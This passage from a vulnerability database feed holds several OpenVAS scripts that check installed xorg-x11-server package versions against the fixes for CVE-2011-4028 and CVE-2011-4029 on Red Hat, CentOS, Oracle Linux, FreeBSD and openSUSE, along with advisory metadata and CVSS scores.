script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xorg-x11-server'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"xorg-x11-server on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"X.Org is an open source implementation of the X Window System. 
It provides\n the basic low-level functionality that full-fledged graphical user\n interfaces are designed upon.\n\n A flaw was found in the way the X.Org server handled lock files. A local\n user with access to the system console could use this flaw to determine the\n existence of a file in a directory not accessible to the user, via a\n symbolic link attack. (CVE-2011-4028)\n\n A race condition was found in the way the X.Org server managed temporary\n lock files. A local attacker could use this flaw to perform a symbolic link\n attack, allowing them to make an arbitrary file world readable, leading to\n the disclosure of sensitive information. (CVE-2011-4029)\n\n Red Hat would like to thank the researcher with the nickname vladz for\n reporting these issues.\n\n This update also fixes the following bugs:\n\n * Prior to this update, the KDE Display Manager (KDM) could pass invalid\n 24bpp pixmap formats to the X server. As a consequence, the X server could\n unexpectedly abort. This update modifies the underlying code to pass the\n correct formats. (BZ#651934, BZ#722860)\n\n * Prior to this update, absolute input devices, like the stylus of a\n graphic tablet, could become unresponsive in the right-most or bottom-most\n screen if the X server was configured as a multi-screen setup through\n multiple 'Device' sections in the xorg.conf file. This update changes the\n screen crossing behavior so that absolute devices are always mapped across\n all screens. (BZ#732467)\n\n * Prior to this update, the misleading message 'Session active, not\n inhibited, screen idle. If you see this test, your display server is broken\n and you should notify your distributor.' could be displayed after resuming\n the system or re-enabling the display, and included a URL to an external\n web page. This update removes this message. (BZ#748704)\n\n * Prior to this update, the erroneous input handling code of the Xephyr\n server disabled screens on a screen crossing event. 
The focus was only on\n the screen where the mouse was located and only this screen was updated\n when the Xephyr nested X server was configured in a multi-screen setup.\n This update removes this code and Xephyr now correctly updates screens in\n multi-screen setups. (BZ#757792)\n\n * Prior to this update, raw events did not contain relative axis values. As\n a consequence, clients which relied on relative values for functioning did\n ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xephyr\", rpm:\"xorg-x11-server-Xephyr~1.10.6~1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xorg\", rpm:\"xorg-x11-server-Xorg~1.10.6~1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.10.6~1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-debuginfo\", rpm:\"xorg-x11-server-debuginfo~1.10.6~1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-06T13:07:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "Check for the Version of xorg-x11-server-common", "modified": "2018-01-05T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:881153", "href": "http://plugins.openvas.org/nasl.php?oid=881153", "type": 
"openvas", "title": "CentOS Update for xorg-x11-server-common CESA-2012:0939 centos6 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for xorg-x11-server-common CESA-2012:0939 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"X.Org is an open source implementation of the X Window System. It provides\n the basic low-level functionality that full-fledged graphical user\n interfaces are designed upon.\n\n A flaw was found in the way the X.Org server handled lock files. A local\n user with access to the system console could use this flaw to determine the\n existence of a file in a directory not accessible to the user, via a\n symbolic link attack. (CVE-2011-4028)\n \n A race condition was found in the way the X.Org server managed temporary\n lock files. A local attacker could use this flaw to perform a symbolic link\n attack, allowing them to make an arbitrary file world readable, leading to\n the disclosure of sensitive information. 
(CVE-2011-4029)\n \n Red Hat would like to thank the researcher with the nickname vladz for\n reporting these issues.\n \n This update also fixes the following bugs:\n \n * Prior to this update, the KDE Display Manager (KDM) could pass invalid\n 24bpp pixmap formats to the X server. As a consequence, the X server could\n unexpectedly abort. This update modifies the underlying code to pass the\n correct formats. (BZ#651934, BZ#722860)\n \n * Prior to this update, absolute input devices, like the stylus of a\n graphic tablet, could become unresponsive in the right-most or bottom-most\n screen if the X server was configured as a multi-screen setup through\n multiple "Device" sections in the xorg.conf file. This update changes the\n screen crossing behavior so that absolute devices are always mapped across\n all screens. (BZ#732467)\n \n * Prior to this update, the misleading message "Session active, not\n inhibited, screen idle. If you see this test, your display server is broken\n and you should notify your distributor." could be displayed after resuming\n the system or re-enabling the display, and included a URL to an external\n web page. This update removes this message. (BZ#748704)\n \n * Prior to this update, the erroneous input handling code of the Xephyr\n server disabled screens on a screen crossing event. The focus was only on\n the screen where the mouse was located and only this screen was updated\n when the Xephyr nested X server was configured in a multi-screen setup.\n This update removes this code and Xephyr now correctly updates screens in\n multi-screen setups. (BZ#757792)\n \n * Prior to this update, raw events did not contain relative axis values. As\n a consequence, clients which relied on relative values for functioning did\n not behave as expected. This update sets the values to the original driver\n values instead of the already transf ... 
\n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"xorg-x11-server-common on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-July/018722.html\");\n script_id(881153);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:24:06 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"CESA\", value: \"2012:0939\");\n script_name(\"CentOS Update for xorg-x11-server-common CESA-2012:0939 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xorg-x11-server-common\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.10.6~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"xorg-x11-server-devel\", rpm:\"xorg-x11-server-devel~1.10.6~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-source\", rpm:\"xorg-x11-server-source~1.10.6~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xdmx\", rpm:\"xorg-x11-server-Xdmx~1.10.6~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xephyr\", rpm:\"xorg-x11-server-Xephyr~1.10.6~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xnest\", rpm:\"xorg-x11-server-Xnest~1.10.6~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xorg\", rpm:\"xorg-x11-server-Xorg~1.10.6~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xvfb\", rpm:\"xorg-x11-server-Xvfb~1.10.6~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server\", rpm:\"xorg-x11-server~1.10.6~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-11T11:06:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "Check for the Version of xorg-x11-server", "modified": "2018-01-09T00:00:00", "published": "2012-06-22T00:00:00", "id": "OPENVAS:870775", "href": "http://plugins.openvas.org/nasl.php?oid=870775", "type": "openvas", "title": "RedHat Update for xorg-x11-server RHSA-2012:0939-04", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for xorg-x11-server RHSA-2012:0939-04\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"X.Org is an open source implementation of the X Window System. It provides\n the basic low-level functionality that full-fledged graphical user\n interfaces are designed upon.\n\n A flaw was found in the way the X.Org server handled lock files. A local\n user with access to the system console could use this flaw to determine the\n existence of a file in a directory not accessible to the user, via a\n symbolic link attack. (CVE-2011-4028)\n\n A race condition was found in the way the X.Org server managed temporary\n lock files. A local attacker could use this flaw to perform a symbolic link\n attack, allowing them to make an arbitrary file world readable, leading to\n the disclosure of sensitive information. 
(CVE-2011-4029)\n\n Red Hat would like to thank the researcher with the nickname vladz for\n reporting these issues.\n\n This update also fixes the following bugs:\n\n * Prior to this update, the KDE Display Manager (KDM) could pass invalid\n 24bpp pixmap formats to the X server. As a consequence, the X server could\n unexpectedly abort. This update modifies the underlying code to pass the\n correct formats. (BZ#651934, BZ#722860)\n \n * Prior to this update, absolute input devices, like the stylus of a\n graphic tablet, could become unresponsive in the right-most or bottom-most\n screen if the X server was configured as a multi-screen setup through\n multiple "Device" sections in the xorg.conf file. This update changes the\n screen crossing behavior so that absolute devices are always mapped across\n all screens. (BZ#732467)\n \n * Prior to this update, the misleading message "Session active, not\n inhibited, screen idle. If you see this test, your display server is broken\n and you should notify your distributor." could be displayed after resuming\n the system or re-enabling the display, and included a URL to an external\n web page. This update removes this message. (BZ#748704)\n \n * Prior to this update, the erroneous input handling code of the Xephyr\n server disabled screens on a screen crossing event. The focus was only on\n the screen where the mouse was located and only this screen was updated\n when the Xephyr nested X server was configured in a multi-screen setup.\n This update removes this code and Xephyr now correctly updates screens in\n multi-screen setups. (BZ#757792)\n \n * Prior to this update, raw events did not contain relative axis values. As\n a consequence, clients which relied on relative values for functioning did\n ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"xorg-x11-server on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 
6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-June/msg00036.html\");\n script_id(870775);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-22 10:26:29 +0530 (Fri, 22 Jun 2012)\");\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_xref(name: \"RHSA\", value: \"2012:0939-04\");\n script_name(\"RedHat Update for xorg-x11-server RHSA-2012:0939-04\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xorg-x11-server\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xephyr\", rpm:\"xorg-x11-server-Xephyr~1.10.6~1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xorg\", rpm:\"xorg-x11-server-Xorg~1.10.6~1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.10.6~1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-debuginfo\", rpm:\"xorg-x11-server-debuginfo~1.10.6~1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-02T21:10:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-04-11T00:00:00", "published": "2012-02-13T00:00:00", "id": "OPENVAS:70617", "href": "http://plugins.openvas.org/nasl.php?oid=70617", "type": "openvas", "title": "FreeBSD Ports: xorg-server", "sourceData": "#\n#VID 8441957c-f9b4-11e0-a78a-bcaec565249c\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 8441957c-f9b4-11e0-a78a-bcaec565249c\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: xorg-server\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(70617);\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-11 11:02:04 +0200 (Tue, 11 Apr 2017) $\");\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_version(\"$Revision: 5931 $\");\n script_name(\"FreeBSD Ports: xorg-server\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"xorg-server\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.7.7_3\")<0) {\n txt += 'Package xorg-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:36:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "Oracle Linux Local Security Checks ELSA-2012-0939", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123878", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123878", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2012-0939", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0939.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the 
Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123878\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:09:45 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0939\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0939 - xorg-x11-server security and bug fix update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0939\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0939.html\");\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xdmx\", rpm:\"xorg-x11-server-Xdmx~1.10.6~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xephyr\", rpm:\"xorg-x11-server-Xephyr~1.10.6~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xnest\", rpm:\"xorg-x11-server-Xnest~1.10.6~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xorg\", rpm:\"xorg-x11-server-Xorg~1.10.6~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xvfb\", rpm:\"xorg-x11-server-Xvfb~1.10.6~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n 
exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.10.6~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-devel\", rpm:\"xorg-x11-server-devel~1.10.6~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-source\", rpm:\"xorg-x11-server-source~1.10.6~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "modified": "2018-10-05T00:00:00", "published": "2012-02-13T00:00:00", "id": "OPENVAS:136141256231070617", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070617", "type": "openvas", "title": "FreeBSD Ports: xorg-server", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_xorg-server2.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID 8441957c-f9b4-11e0-a78a-bcaec565249c\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70617\");\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_version(\"$Revision: 11762 $\");\n script_name(\"FreeBSD Ports: xorg-server\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: xorg-server\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"xorg-server\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.7.7_3\")<0) {\n txt += 'Package xorg-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-31T18:42:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2012-08-02T00:00:00", "id": "OPENVAS:1361412562310850266", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850266", "type": "openvas", "title": "openSUSE: Security Advisory for xorg-x11-server (openSUSE-SU-2012:0227-1)", "sourceData": "# Copyright (C) 2012 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published 
